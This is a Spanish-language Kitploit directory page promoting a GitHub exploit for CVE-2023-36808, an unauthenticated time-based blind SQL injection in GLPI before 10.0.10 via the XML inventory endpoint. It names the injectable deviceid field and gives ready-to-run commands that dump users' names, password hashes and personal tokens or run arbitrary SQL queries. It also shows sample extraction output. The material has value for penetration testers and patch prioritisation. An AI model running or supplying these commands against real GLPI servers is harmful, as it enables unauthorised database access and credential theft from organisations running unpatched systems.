Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/fransosiche/exploit-cve-2023-36808
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de Penetración
GitHubfransosiche/exploit-cve-2023-36808

exploit-cve-2023-36808

Exploit de inyección SQL ciega basada en tiempo para CVE-2023-36808 en GLPI < 10.0.10. Extrae credenciales de usuario y contenido de la base de datos a través del endpoint de inventario XML no autenticado con optimización de búsqueda binaria.

Ver Repositorio
1hace 3 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-36808 - Inyección SQL no autenticada en GLPI

Vulnerabilidad

Las versiones de GLPI < 10.0.10 exponen un endpoint de inventario XML no autenticado en /front/inventory.php.
El campo <deviceid> se inyecta directamente en una consulta SQL sin sanitización:

root@kitploit:~
SELECT id FROM glpi_agents WHERE deviceid = '<INJECT>'

No se requiere autenticación. La vulnerabilidad permite acceso de lectura completo a la base de datos mediante inyección SQL ciega.

Exploit

Este script utiliza inyección ciega basada en tiempo con búsqueda binaria para extraer datos de manera significativamente más rápida que las herramientas genéricas.

  • Un SLEEP por comprobación booleana (confiable independientemente del tamaño de la tabla)
  • Búsqueda binaria: ~7 solicitudes por carácter en lugar de 95
  • Paralelismo a nivel de campo: nombre, contraseña y token extraídos simultáneamente por usuario
  • Límite de concurrencia evita interferencias de temporización entre solicitudes paralelas

Requisitos

root@kitploit:~
pip install -r requirements.txt

Uso

root@kitploit:~
# Dump the full glpi_users table (name, password hash, personal_token)
python3 exploit.py http://<TARGET>/glpi

# Custom SQL query
python3 exploit.py http://<TARGET>/glpi --query "SELECT @@version"

# Tune timing (lower sleep = faster, increase if you get wrong results)
python3 exploit.py http://<TARGET>/glpi --sleep 0.3

# Increase parallel request cap (default 2, raise on high-latency remote targets)
python3 exploit.py http://<TARGET>/glpi --parallel 4

Ejemplo de salida

root@kitploit:~
[*] CVE-2023-36808 - GLPI Unauthenticated SQLi
[*] Target : http://10.0.0.1/glpi/front/inventory.php
[*] Sleep  : 0.5s  Threshold: 0.35s  Parallel: 2

[+] Target reachable
[+] Injection confirmed

[*] User 1/7
  name               glpi
  password           $2y$10$xN.12pQxSLlQdMJzP26EWe...
  personal_token     xxxx
...

Referencias

  • NVD - CVE-2023-36808
  • Aviso de seguridad de GLPI
Descargar herramienta